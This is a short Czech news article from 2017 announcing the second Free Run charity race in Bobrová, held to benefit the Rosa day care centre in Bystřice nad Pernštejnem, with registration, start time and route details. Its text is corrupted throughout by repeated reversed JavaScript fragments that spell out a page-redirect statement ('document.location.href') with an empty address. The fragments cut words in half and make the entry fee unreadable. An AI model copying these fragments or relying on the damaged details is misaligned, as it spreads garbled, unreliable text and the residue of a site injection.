Rainbow page separator

Běh kolem Bobrové podpoří bystřický denní stacionář

Středa, 7. června 2017

Bobrová / Během pomoci jak svému zdraví, tak i dobré věci je možné v sobotu 10. června při druhém ročníku Free Run běhu v Bobrové. Výtěžek dobročinné akce s názvem Free Run pomáhá ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát poputuje dennímu stacionáři Rosa v Bystřici nad Pernštejnem.
Registrace a start se uskuteční na hasičském cvičišti pod hrází rybníka Kaňovec v Dolní Bobrové. Star[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovné činí s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to korun na osobu, registrace začne ve 14 hodin a běžci, kteří dostanou možnost vybrat si z tras v délce 5, 10, 15 a 20 kilometrů, odstartují o hodinu později – v 15 hodin.
Po doběhnutí závodníků do cíle se zájemci budou moci občerstvit masem či veganskými pochoutkami, pivem i domácí limonádou, zhodnotit průběh závodu, popovídat si s přáteli a ostatními běžci, případně přispět svým zápisem do kroniky běžeckého charitativního závodu.